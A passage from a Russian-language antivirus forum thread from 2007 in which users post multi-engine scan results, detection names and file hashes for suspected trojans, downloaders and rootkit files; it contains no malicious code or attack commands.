*eSafe	7.0.15.0	2007.07.24	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5008	2007.07.26	-
Ewido	4.0	2007.07.27	-
FileAdvisor	1	2007.07.27	-
Fortinet	2.91.0.0	2007.07.27	-
F-Prot	4.3.2.48	2007.07.27	-
*F-Secure	6.70.13030.0	2007.07.27	Packed.Win32.PolyCrypt.b
Ikarus	T3.1.1.8	2007.07.27	Trojan-Downloader.Win32.Small.cyn
Kaspersky	4.0.2.24	2007.07.27	Packed.Win32.PolyCrypt.b*
McAfee	5084	2007.07.26	-
*Microsoft	1.2704	2007.07.27	Trojan:Win32/Anomaly.gen!A*
NOD32v2	2425	2007.07.27	-
Norman	5.80.02	2007.07.27	-
Panda	9.0.0.4	2007.07.27	-
*Rising	19.33.42.00	2007.07.27	Packer.RyCrypt
Sophos	4.19.0	2007.07.26	Mal/Basine-C*
Sunbelt	2.2.907.0	2007.07.26	-
Symantec	10	2007.07.27	-
TheHacker	6.1.7.155	2007.07.27	-
VBA32	3.12.2.1	2007.07.27	-
*VirusBuster	4.3.26:9	2007.07.27	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.07.27	Trojan.Crypt.XPACK.Gen*
Additional information
File size: 25743 bytes
MD5: 10561044f4cc7d87c8ca4631ecc23fb7
SHA1: 2a8ff74ff2b208178bd7978969a5e0a6c573104f

----------


## drongo

T-11377


```
 File avz00007.dta received on 07.27.2007 18:36:32 (CET)
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.7.28.0	2007.07.27	-
AntiVir	7.4.0.50	2007.07.27	HEUR/Crypted
Authentium	4.93.8	2007.07.27	Possibly a new variant of W32/Threat-HLLSI-based!Maximus
Avast	4.7.997.0	2007.07.27	-
AVG	7.5.0.476	2007.07.27	PSW.Generic5.KY
BitDefender	7.2	2007.07.27	Trojan.PWS.Goldun.SYT
CAT-QuickHeal	9.00	2007.07.26	-
ClamAV	0.91	2007.07.27	-
DrWeb	4.33	2007.07.27	Trojan.PWS.GoldSpy
eSafe	7.0.15.0	2007.07.24	suspicious Trojan/Worm
eTrust-Vet	31.1.5008	2007.07.26	-
Ewido	4.0	2007.07.27	-
FileAdvisor	1	2007.07.27	-
Fortinet	2.91.0.0	2007.07.27	Dowdec!tr
F-Prot	4.3.2.48	2007.07.27	W32/Threat-HLLSI-based!Maximus
F-Secure	6.70.13030.0	2007.07.27	Trojan-Spy.Win32.Goldun.pc
Ikarus	T3.1.1.8	2007.07.27	Trojan-PWS.Goldun.SYT
Kaspersky	4.0.2.24	2007.07.27	Trojan-Spy.Win32.Goldun.pc
McAfee	5084	2007.07.26	-
Microsoft	1.2704	2007.07.27	-
NOD32v2	2425	2007.07.27	-
Norman	5.80.02	2007.07.27	-
Panda	9.0.0.4	2007.07.27	Dialer.KMO
Rising	19.33.42.00	2007.07.27	-
Sophos	4.19.0	2007.07.26	Troj/Dowdec-Gen
Sunbelt	2.2.907.0	2007.07.26	VIPRE.Suspicious
Symantec	10	2007.07.27	-
TheHacker	6.1.7.155	2007.07.27	-
VBA32	3.12.2.1	2007.07.27	suspected of Downloader.Small.33
VirusBuster	4.3.26:9	2007.07.27	-
Webwasher-Gateway	6.0.1	2007.07.27	Heuristic.Crypted
Additional information
File size: 11776 bytes
MD5: 8c9584c8b6606b137ac0bcc2bcf16e0b
SHA1: c60eb19bd704436755f20ab1d6069cafce4050bc
packers: UPX
packers: UPX
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
```

----------


## Синауридзе Александр

File loader.exe received on 07.28.2007 14:59:45 (CET)

Antivirus Version Last Update Result 
AhnLab-V3 2007.7.28.0 2007.07.27 - 
*AntiVir 7.4.0.50 2007.07.27 TR/Dldr.Small.exz*
Authentium 4.93.8 2007.07.27 - 
*Avast 4.7.997.0 2007.07.27 Win32:Tiny-HD*
*AVG 7.5.0.476 2007.07.27 Downloader.Generic5.GEJ*
*BitDefender 7.2 2007.07.28 Generic.Malware.dld!!.927334E4*
CAT-QuickHeal 9.00 2007.07.28 - 
ClamAV 0.91 2007.07.28 - 
*DrWeb 4.33 2007.07.28 DLOADER.Trojan*
*eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm*
*eTrust-Vet 31.1.5010 2007.07.28 Win32/Shadown.A* 
Ewido 4.0 2007.07.28 - 
FileAdvisor 1 2007.07.28 - 
*Fortinet 2.91.0.0 2007.07.28 Heuri.E* 
*F-Prot 4.3.2.48 2007.07.27 W32/Downloader-Sml-based!Maximus*
*F-Secure 6.70.13030.0 2007.07.27 Trojan-Downloader.Win32.Small.exz*
*Ikarus T3.1.1.8 2007.07.28 Win32.SuspectCrc*
*Kaspersky 4.0.2.24 2007.07.28 Trojan-Downloader.Win32.Small.exz*
McAfee 5085 2007.07.27 - 
Microsoft 1.2704 2007.07.28 - 
*NOD32v2 2426 2007.07.27 probably unknown NewHeur_PE virus*
*Norman 5.80.02 2007.07.27 W32/Downloader*
*Panda 9.0.0.4 2007.07.28 Generic Malware*
*Rising 19.33.52.00 2007.07.28 Trojan.DL.Tiny.ab*
*Sophos 4.19.0 2007.07.26 Mal/Heuri-E* 
*Sunbelt 2.2.907.0 2007.07.28 Trojan-Downloader.Win32.Small.exz*
Symantec 10 2007.07.28 - 
*TheHacker 6.1.7.155 2007.07.28 Trojan/Downloader.Small.exz*
*VBA32 3.12.2.1 2007.07.27 Trojan-Downloader.Win32.Small.exz*
VirusBuster 4.3.26:9 2007.07.27 - 
*Webwasher-Gateway 6.0.1 2007.07.28 Trojan.Dldr.Small.exz*

Additional information 
File size: 1020 bytes 
MD5: 06ade3c8d40cd6cd2e0a4f8a3ab8acac 
SHA1: f181e447edb61f1cad1fa3fe3492890b382179d0

----------


## ISO

File FG.EXE received on 07.30.2007 07:22:31 (CET)
Current status: Loading ...   finished 
Loading server information... 
 Compact 
Print results  Antivirus	Version	Last Update	Result
AhnLab-V3	2007.7.28.0	2007.07.27	-
AntiVir	7.4.0.50	2007.07.30	-
Authentium	4.93.8	2007.07.27	-
Avast	4.7.997.0	2007.07.30	-
AVG	7.5.0.476	2007.07.30	-
BitDefender	7.2	2007.07.30	-
CAT-QuickHeal	9.00	2007.07.28	-
ClamAV	0.91	2007.07.30	-
DrWeb	4.33	2007.07.30	-
*eSafe	7.0.15.0	2007.07.29	suspicious Trojan/Worm*
eTrust-Vet	31.1.5010	2007.07.28	-
Ewido	4.0	2007.07.29	-
FileAdvisor	1	2007.07.30	-
Fortinet	2.91.0.0	2007.07.30	-
F-Prot	4.3.2.48	2007.07.27	-
F-Secure	6.70.13030.0	2007.07.30	-
*Ikarus	T3.1.1.8	2007.07.29	Backdoor.Win32.Delf.apa*
Kaspersky	4.0.2.24	2007.07.30	-
McAfee	5085	2007.07.27	-
Microsoft	1.2704	2007.07.30	-
NOD32v2	2428	2007.07.30	-
Norman	5.80.02	2007.07.27	-
Panda	9.0.0.4	2007.07.29	-
Rising	19.34.00.00	2007.07.30	-
Sophos	4.19.0	2007.07.26	-
Sunbelt	2.2.907.0	2007.07.28	-
Symantec	10	2007.07.30	-
TheHacker	6.1.7.158	2007.07.30	-
VBA32	3.12.2.1	2007.07.30	-
VirusBuster	4.3.26:9	2007.07.29	-
*Webwasher-Gateway	6.0.1	2007.07.30	Win32.ModifiedUPX.gen!90 (suspicious)*
Additional information
File size: 387584 bytes
MD5: bf32d217b7c5ee975e5a41cb7b9f24d4
SHA1: 7418ff18d07a64f81f0ef259e2cc391ceb062fa7
packers: UPX
packers: UPX
packers: UPX

----------


## Winsent

File sms.exe received on 07.31.2007 07:49:38 (CET)


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.7.31.1	2007.07.31	-
*AntiVir	7.4.0.54	2007.07.30	HEUR/Crypted*
Authentium	4.93.8	2007.07.30	-
Avast	4.7.997.0	2007.07.30	-
AVG	7.5.0.476	2007.07.30	-
*BitDefender	7.2	2007.07.31	Trojan.PWS.LDPinch.TAW*
CAT-QuickHeal	9.00	2007.07.30	-
ClamAV	0.91	2007.07.31	-
DrWeb	4.33	2007.07.31	-
eSafe	7.0.15.0	2007.07.29	-
eTrust-Vet	31.1.5018	2007.07.31	-
Ewido	4.0	2007.07.30	-
FileAdvisor	1	2007.07.31	-
Fortinet	2.91.0.0	2007.07.31	-
F-Prot	4.3.2.48	2007.07.30	-
F-Secure	6.70.13030.0	2007.07.31	-
Ikarus	T3.1.1.8	2007.07.31	-
Kaspersky	4.0.2.24	2007.07.31	-
*McAfee	5086	2007.07.30	New Malware.ek*
Microsoft	1.2704	2007.07.30	-
NOD32v2	2429	2007.07.30	-
*Norman	5.80.02	2007.07.30	Suspicious_P.gen*
Panda	9.0.0.4	2007.07.31	-
Prevx1	V2	2007.07.31	-
Rising	19.34.11.00	2007.07.31	-
*Sophos	4.19.0	2007.07.26	Mal/Basine-C
Sunbelt	2.2.907.0	2007.07.31	VIPRE.Suspicious*
Symantec	10	2007.07.31	-
TheHacker	6.1.7.159	2007.07.31	-
VBA32	3.12.2.2	2007.07.30	-
*VirusBuster	4.3.26:9	2007.07.30	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.07.31	Heuristic.Crypted*

----------


## Shu_b

t=11364 (проверялось вчера)



```
 File nso12k.sys received on 07.30.2007 09:46:16 (CET)
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.7.28.0	2007.07.30	-
AntiVir	7.4.0.50	2007.07.30	-
Authentium	4.93.8	2007.07.27	-
Avast	4.7.997.0	2007.07.30	Win32:Agent-JKC
AVG	7.5.0.476	2007.07.30	-
BitDefender	7.2	2007.07.30	-
CAT-QuickHeal	9.00	2007.07.28	-
ClamAV	0.91	2007.07.30	-
DrWeb	4.33	2007.07.30	-
eSafe	7.0.15.0	2007.07.29	-
eTrust-Vet	31.1.5010	2007.07.28	-
Ewido	4.0	2007.07.29	-
FileAdvisor	1	2007.07.30	-
Fortinet	2.91.0.0	2007.07.30	-
F-Prot	4.3.2.48	2007.07.27	-
F-Secure	6.70.13030.0	2007.07.30	-
Ikarus	T3.1.1.8	2007.07.30	Trojan.Win32.Agent.AMR
Kaspersky	4.0.2.24	2007.07.30	-
McAfee	5085	2007.07.27	New Malware.z
Microsoft	1.2704	2007.07.30	-
NOD32v2	2428	2007.07.30	-
Norman	5.80.02	2007.07.27	-
Panda	9.0.0.4	2007.07.29	Rootkit/Agent.GAC
Prevx1	V2	2007.07.30	-
Rising	19.34.01.00	2007.07.30	-
Sophos	4.19.0	2007.07.26	-
Sunbelt	2.2.907.0	2007.07.28	-
Symantec	10	2007.07.30	Hacktool.Rootkit
TheHacker	6.1.7.158	2007.07.30	-
VBA32	3.12.2.1	2007.07.30	-
VirusBuster	4.3.26:9	2007.07.29	-
Webwasher-Gateway	6.0.1	2007.07.30	-
Additional information
File size: 4064 bytes
MD5: f86bcf371145c026fdc403480f495c44
SHA1: 3ac546cd4ea0a5bce316f0cc28ac7f1b7ce1bf00
```




```
 File cssrss.exe received on 07.30.2007 09:46:30 (CET)
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.7.28.0	2007.07.30	-
AntiVir	7.4.0.50	2007.07.30	HEUR/Crypted
Authentium	4.93.8	2007.07.27	-
Avast	4.7.997.0	2007.07.30	-
AVG	7.5.0.476	2007.07.30	-
BitDefender	7.2	2007.07.30	-
CAT-QuickHeal	9.00	2007.07.28	(Suspicious) - DNAScan
ClamAV	0.91	2007.07.30	-
DrWeb	4.33	2007.07.30	-
eSafe	7.0.15.0	2007.07.29	suspicious Trojan/Worm
eTrust-Vet	31.1.5010	2007.07.28	-
Ewido	4.0	2007.07.29	-
FileAdvisor	1	2007.07.30	-
Fortinet	2.91.0.0	2007.07.30	-
F-Prot	4.3.2.48	2007.07.27	-
F-Secure	6.70.13030.0	2007.07.30	-
Ikarus	T3.1.1.8	2007.07.30	-
Kaspersky	4.0.2.24	2007.07.30	-
McAfee	5085	2007.07.27	-
Microsoft	1.2704	2007.07.30	-
NOD32v2	2428	2007.07.30	-
Norman	5.80.02	2007.07.27	-
Panda	9.0.0.4	2007.07.29	Trj/Agent.GAD
Rising	19.34.01.00	2007.07.30	-
Prevx1	V2	2007.07.30	-
Sophos	4.19.0	2007.07.26	-
Sunbelt	2.2.907.0	2007.07.28	VIPRE.Suspicious
Symantec	10	2007.07.30	-
TheHacker	6.1.7.158	2007.07.30	-
VBA32	3.12.2.1	2007.07.30	-
VirusBuster	4.3.26:9	2007.07.29	-
Webwasher-Gateway	6.0.1	2007.07.30	Heuristic.Crypted
Additional information
File size: 15752 bytes
MD5: 62f716218dbfac6dbafc0a94117af899
SHA1: c883ed07aae8df7109742b069ba7a3fe85e8ec22
```

 Kaspersky Anti-Virus  	
Found Trojan-Downloader.Win32.Agent.bnz, Trojan.Win32.Agent.amr 
 Dr.Web  	
Found Trojan.NtRootKit.323, Trojan.NtRootKit.322

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## yu_mor

File navu32.exe received on 07.31.2007 08:27:56 (CET)
Current status:    finished 

Print results Antivirus	Version	Last Update	Result
AhnLab-V3	2007.7.31.1	2007.07.31	-
*AntiVir	7.4.0.54	2007.07.30	HEUR/Crypted*
*Authentium	4.93.8	2007.07.30	Possibly a new variant of W32/Threat-SysVenFakU-based!Maximus
*Avast	4.7.997.0	2007.07.30	-
AVG	7.5.0.476	2007.07.30	-
BitDefender	7.2	2007.07.31	-
*CAT-QuickHeal	9.00	2007.07.30	(Suspicious) - DNAScan*
ClamAV	0.91	2007.07.31	-
DrWeb	4.33	2007.07.31	-
*eSafe	7.0.15.0	2007.07.29	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5018	2007.07.31	-
Ewido	4.0	2007.07.30	-
FileAdvisor	1	2007.07.31	-
Fortinet	2.91.0.0	2007.07.31	-
*F-Prot	4.3.2.48	2007.07.30	W32/Threat-SysVenFakU-based!Maximus
*F-Secure	6.70.13030.0	2007.07.31	-
*Ikarus	T3.1.1.8	2007.07.31	Trojan-Downloader.Win32.Zlob.and
*Kaspersky	4.0.2.24	2007.07.31	-
*McAfee	5086	2007.07.30	New Malware.aj*
Microsoft	1.2704	2007.07.31	-
NOD32v2	2429	2007.07.30	-
*Norman	5.80.02	2007.07.30	W32/Suspicious_U.gen
*_Panda	9.0.0.4	2007.07.31	Suspicious file_
Prevx1	V2	2007.07.31	-
Rising	19.34.11.00	2007.07.31	-
*Sophos	4.19.0	2007.07.26	Mal/Packer
*Sunbelt	2.2.907.0	2007.07.31	-
Symantec	10	2007.07.31	-
TheHacker	6.1.7.159	2007.07.31	-
VBA32	3.12.2.2	2007.07.30	-
VirusBuster	4.3.26:9	2007.07.30	-
*Webwasher-Gateway	6.0.1	2007.07.31	Heuristic.Crypted*
Additional information
File size: 62826 bytes
MD5: c558cf168f705122af62aa561f1e05f2
SHA1: ad14017668f81d6de0d515378590c010da383688
packers: UPACK

странно:
File Version Information : 
Company Name		:  Microsoft Corporation
File Description		:  NetWork Monitor Control
File Version		:  5.0.2134.1
Internal Name		:  navu32.exe
Legal Copyright		:  Copyright (C) Microsoft Corp. 1991-2001
Original Filename	:  navu32.exe
Product Name		:  Microsoft(R) Windows (R) 2000 Operating System
Product Version		:  5.0.2195.3649
Comments		:  
Legal Trademarks	:  Microsoft(R) is a registered trademark of Microsoft Corporation in the U.S. and/or other countries.
Private Build		:  
Special Build		:  

Creation Date		: 30/07/2007  17:50:14 
Last Modif. Date		: 10/01/2000  16:00:00 
Last Access Date	: 31/07/2007  00:00:00 
FileSize			: 62826 bytes ( 61.354 KB,  0.060 MB ) 
FileVersionInfoSize	: 2396 bytes  
File type		: Application (0x1) 
Target OS		: Win32 API (Windows NT) (0x40004) 
File/Product version	: 5.0.2195.3649 / 5.0.2195.3649
Language 		: Английский (США) (0x409)
Character Set		: (0x4B0)

----------


## Muzzle

из темы http://virusinfo.info/showthread.php?t=11425
*C:\Windows\System32\Check.exe*



> AhnLab-V3	2007.7.31.1	2007.08.01	-
> AntiVir	7.4.0.54	2007.07.31	-
> Authentium	4.93.8	2007.07.31	-
> Avast	4.7.1029.0	2007.07.31	-
> AVG	7.5.0.476	2007.07.31	-
> BitDefender	7.2	2007.08.01	-
> CAT-QuickHeal	9.00	2007.07.31	-
> ClamAV	0.91	2007.08.01	-
> DrWeb	4.33	2007.07.31	-
> ...


и касперский будет опознавать как *Trojan-PSW.Win32.WOW.lq*,после обновления баз.

----------


## yu_mor

File sysdrv9.exe received on 08.01.2007 13:40:48 (CET)
Current status:   finished 
Result: 5/32 (15.63%) 
 Compact 
Print results  Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.2.0	2007.08.01	-
AntiVir	7.4.0.54	2007.08.01	-
Authentium	4.93.8	2007.07.31	could be a corrupted executable file
Avast	4.7.1029.0	2007.08.01	-
AVG	7.5.0.476	2007.07.31	-
BitDefender	7.2	2007.08.01	-
CAT-QuickHeal	9.00	2007.07.31	-
ClamAV	0.91	2007.08.01	-
DrWeb	4.33	2007.08.01	-
*eSafe	7.0.15.0	2007.07.31	suspicious Trojan/Worm*
eTrust-Vet	31.1.5022	2007.08.01	-
Ewido	4.0	2007.08.01	-
FileAdvisor	1	2007.08.01	-
Fortinet	2.91.0.0	2007.08.01	-
F-Prot	4.3.2.48	2007.07.31	-
*F-Secure	6.70.13030.0	2007.08.01	Trojan-Spy.Win32.Small.gv*
Ikarus	T3.1.1.8	2007.08.01	-
*Kaspersky	4.0.2.24	2007.08.01	Trojan-Spy.Win32.Small.gv*
McAfee	5087	2007.07.31	-
Microsoft	1.2704	2007.08.01	-
NOD32v2	2430	2007.07.31	-
Norman	5.80.02	2007.07.31	-
Panda	9.0.0.4	2007.08.01	-
Prevx1	V2	2007.08.01	-
Rising	19.34.22.00	2007.08.01	-
Sophos	4.19.0	2007.08.01	-
Sunbelt	2.2.907.0	2007.07.31	-
Symantec	10	2007.08.01	-
TheHacker	6.1.7.160	2007.08.01	-
VBA32	3.12.2.2	2007.07.31	-
VirusBuster	4.3.26:9	2007.07.31	-
*Webwasher-Gateway	6.0.1	2007.08.01	Win32.Malware.dam (suspicious)*
Additional information
File size: 11895 bytes
MD5: a9aa11fe83fd5802a6064047dd7e940d
SHA1: d85f431154e43293a795a31912e53466322082d7

Complete scanning result of "googletoolbar1.dll", processed in VirusTotal at 08/02/2007 08:17:54 (CET).

[ file data ]
* name: googletoolbar1.dll
* size: 19968
* md5.: 76346c994571a4dab5b3904a61afd3d4
* sha1: dfc84eed7e817e1b29411a4a54c202bfe51f40c9

[ scan result ]
AhnLab-V3	2007.8.2.0/20070802	found nothing
*AntiVir	7.4.0.54/20070801	found [TR/BHO.Agent.19968]*
Authentium	4.93.8/20070802	found nothing
Avast	4.7.1029.0/20070801	found nothing
AVG	7.5.0.476/20070801	found nothing
BitDefender	7.2/20070802	found nothing
CAT-QuickHeal	9.00/20070801	found nothing
ClamAV	0.91/20070801	found nothing
DrWeb	4.33/20070801	found nothing
eSafe	7.0.15.0/20070731	found nothing
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
*F-Secure	6.70.13030.0/20070802	found [Trojan.Win32.Agent.aun]*
FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
Ikarus	T3.1.1.8/20070802	found nothing
*Kaspersky	4.0.2.24/20070802	found [Trojan.Win32.Agent.aun]*
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
*Norman	5.80.02/20070801	found [W32/Horst.gen25]*
*Panda	9.0.0.4/20070802	found [Suspicious file]*
Rising	19.34.30.00/20070802	found nothing
*Sophos	4.19.0/20070801	found [Mal/Behav-004*]
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
VBA32	3.12.2.2/20070801	found nothing
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Trojan.BHO.Agent.19968]
*

Complete scanning result of "sysdrv2.exe", processed in VirusTotal at 08/02/2007 08:11:20 (CET).

[ file data ]
* name: sysdrv2.exe
* size: 3616
* md5.: 8e2817e1b7fb2fbf2adb90ceab97f9c2
* sha1: f519a9b16d7265e6d385e1d24f9e7241eedc97ae

[ scan result ]
AhnLab-V3	2007.8.2.0/20070802	found nothing
AntiVir	7.4.0.54/20070801	found nothing
*Authentium	4.93.8/20070802	found [W32/Downldr2.AJMZ]
Avast	4.7.1029.0/20070801	found [Win32:Agent-ITC]
*AVG	7.5.0.476/20070801	found nothing
BitDefender	7.2/20070802	found nothing
CAT-QuickHeal	9.00/20070801	found nothing
*ClamAV	0.91/20070801	found [Trojan.Downloader-10584]*
DrWeb	4.33/20070801	found nothing
*eSafe	7.0.15.0/20070731	found [Suspicious Trojan/Worm]*
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
*F-Prot	4.3.2.48/20070801	found [W32/Downldr2.AJMZ]*
*F-Secure	6.70.13030.0/20070802	found [Trojan-Downloader.Win32.Agent.bvl]
*FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
*Ikarus	T3.1.1.8/20070802	found [Trojan-Downloader.Win32.Agent.bvl]
Kaspersky	4.0.2.24/20070802	found [Trojan-Downloader.Win32.Agent.bvl]
*McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
Norman	5.80.02/20070801	found nothing
Panda	9.0.0.4/20070802	found nothing
Prevx1	V2/20070802	found nothing
Rising	19.34.30.00/20070802	found nothing
Sophos	4.19.0/20070801	found nothing
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
*VBA32	3.12.2.2/20070801	found [Trojan-Downloader.Win32.Agent.bvl]
*VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Win32.Malware.dam (suspicious)]
*

Complete scanning result of "sysdrv4.exe", processed in VirusTotal at 08/02/2007 08:10:46 (CET).

[ file data ]
* name: sysdrv4.exe
* size: 3616
* md5.: 264c9fe6ea9caf2d1159a41d44d4eab2
* sha1: 444ea4a9b0fbbef9ce4a01542dc7dae30d0230d8

[ scan result ]
AhnLab-V3	2007.8.2.0/20070802	found nothing
AntiVir	7.4.0.54/20070801	found nothing
Authentium	4.93.8/20070802	found nothing
Avast	4.7.1029.0/20070801	found nothing
AVG	7.5.0.476/20070801	found nothing
BitDefender	7.2/20070802	found nothing
*CAT-QuickHeal	9.00/20070801	found [(Suspicious) - DNAScan]*
ClamAV	0.91/20070801	found nothing
DrWeb	4.33/20070801	found nothing
*eSafe	7.0.15.0/20070731	found [suspicious Trojan/Worm]*
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
F-Secure	6.70.13030.0/20070802	found nothing
FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
*Ikarus	T3.1.1.8/20070802	found [Trojan-Downloader.Win32.Small.ckj]*
Kaspersky	4.0.2.24/20070802	found nothing
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found [unpack error]
*Norman	5.80.02/20070801	found [Suspicious_F.gen]*
*Panda	9.0.0.4/20070802	found [Suspicious file]*
Prevx1	V2/20070802	found nothing
*Rising	19.34.30.00/20070802	found [Backdoor.Win32.Small.ls]*
Sophos	4.19.0/20070801	found nothing
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
VBA32	3.12.2.2/20070801	found nothing
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Win32.Malware.gen#FSG (suspicious)]
*

Complete scanning result of "~.exe", processed in VirusTotal at 08/02/2007 08:09:17 (CET).

[ file data ]
* name: ~.exe
* size: 2228
* md5.: aff86add4004a101f914be6f0581769c
* sha1: 1fc74362f9df55ee54c0c9283fc6aae397aa7842

[ scan result ]
 AhnLab-V3	2007.8.2.0/20070802	found nothing
AntiVir	7.4.0.54/20070801	found nothing
Authentium	4.93.8/20070802	found [could be a corrupted executable file]
Avast	4.7.1029.0/20070801	found nothing
AVG	7.5.0.476/20070801	found nothing
BitDefender	7.2/20070802	found nothing
CAT-QuickHeal	9.00/20070801	found nothing
ClamAV	0.91/20070801	found nothing
DrWeb	4.33/20070801	found nothing
eSafe	7.0.15.0/20070731	found nothing
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
F-Secure	6.70.13030.0/20070802	found nothing
FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
Ikarus	T3.1.1.8/20070802	found nothing
Kaspersky	4.0.2.24/20070802	found nothing
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
Norman	5.80.02/20070801	found nothing
Panda	9.0.0.4/20070802	found nothing
Rising	19.34.30.00/20070802	found nothing
Sophos	4.19.0/20070801	found nothing
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
VBA32	3.12.2.2/20070801	found nothing
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Win32.Malware.dam (suspicious)]*

----------


## V_Bond

```
hnLab-V3	2007.8.2.0	2007.08.01	-
AntiVir	7.4.0.54	2007.08.01	TR/Crypt.XPACK.Gen
Authentium	4.93.8	2007.07.31	-
Avast	4.7.1029.0	2007.08.01	-
AVG	7.5.0.476	2007.07.31	-
BitDefender	7.2	2007.08.01	-
CAT-QuickHeal	9.00	2007.07.31	(Suspicious) - DNAScan
ClamAV	0.91	2007.08.01	-
DrWeb	4.33	2007.08.01	-
eSafe	7.0.15.0	2007.07.31	-
eTrust-Vet	31.1.5022	2007.08.01	-
Ewido	4.0	2007.08.01	-
FileAdvisor	1	2007.08.01	-
Fortinet	2.91.0.0	2007.08.01	-
F-Prot	4.3.2.48	2007.07.31	-
F-Secure	6.70.13030.0	2007.08.01	-
Ikarus	T3.1.1.8	2007.08.01	-
Kaspersky	4.0.2.24	2007.08.01	-
McAfee	5087	2007.07.31	-
Microsoft	1.2704	2007.08.01	PWS:Win32/Bankrypt.gen
NOD32v2	2430	2007.07.31	-
Norman	5.80.02	2007.07.31	-
Panda	9.0.0.4	2007.08.01	Suspicious file
Prevx1	V2	2007.08.01	-
Rising	19.34.22.00	2007.08.01	-
Sophos	4.19.0	2007.08.01	-
Sunbelt	2.2.907.0	2007.07.31	VIPRE.Suspicious
Symantec	10	2007.08.01	-
TheHacker	6.1.7.160	2007.08.01	-
VBA32	3.12.2.2	2007.07.31	-
VirusBuster	4.3.26:9	2007.08.01	-
Webwasher-Gateway	6.0.1	2007.08.01	Trojan.Crypt.XPACK.Gen
Additional information
File size: 478208 bytes
MD5: 58cb2f0941876bf115ebe49cfdbb8c78
SHA1: 33d8624006e512915ebaa5dbf50c12e47eb03b95
```

----------


## yu_mor

просто жуть!
Complete scanning result of "603-a[1].exe", processed in VirusTotal at 08/02/2007 09:40:40 (CET).

[ file data ]
* name: 603-a[1].exe
* size: 31232
* md5.: 757dfe2127314a1473ed0392b06174e6
* sha1: 774ac812b505d57c7b958ee06cebb978ee86d1ba

[ scan result ]
 AhnLab-V3	2007.8.2.0/20070802	found nothing
*AntiVir	7.4.0.57/20070802	found [TR/Proxy.Small.DU.1300]*
Authentium	4.93.8/20070802	found nothing
Avast	4.7.1029.0/20070801	found nothing
*AVG	7.5.0.476/20070801	found [SHeur.DZI]*
BitDefender	7.2/20070802	found nothing
CAT-QuickHeal	9.00/20070801	found nothing
ClamAV	0.91/20070801	found nothing
DrWeb	4.33/20070802	found nothing
*eSafe	7.0.15.0/20070731	found [Suspicious Trojan/Worm]
*eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
*F-Secure	6.70.13030.0/20070802	found [Trojan-Proxy.Win32.Small.du]
*FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
*Ikarus	T3.1.1.8/20070802	found [Trojan-Proxy.Win32.Small.DU]*
*Kaspersky	4.0.2.24/20070802	found [Trojan-Proxy.Win32.Small.du]*
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
Norman	5.80.02/20070801	found nothing
Panda	9.0.0.4/20070802	found nothing
Prevx1	V2/20070802	found nothing
*Rising	19.34.30.00/20070802	found [Backdoor.Gpigeon.2006.ixo]*
Sophos	4.19.0/20070801	found nothing
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
VBA32	3.12.2.2/20070801	found nothing
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Win32.NewMalware.IM!31232!4]
*

Complete scanning result of "d[1].exe", processed in VirusTotal at 08/02/2007 10:18:03 (CET).

[ file data ]
* name: d[1].exe
* size: 58880
* md5.: 1deb83fa1f3d96a0602e24d7e51bc773
* sha1: 923e878d9840ad23c42eb85a7dcb80c17349dc0b

[ scan result ]
AhnLab-V3	2007.8.2.0/20070802	found nothing
*AntiVir	7.4.0.57/20070802	found [TR/Obfuscated.GP.34]*
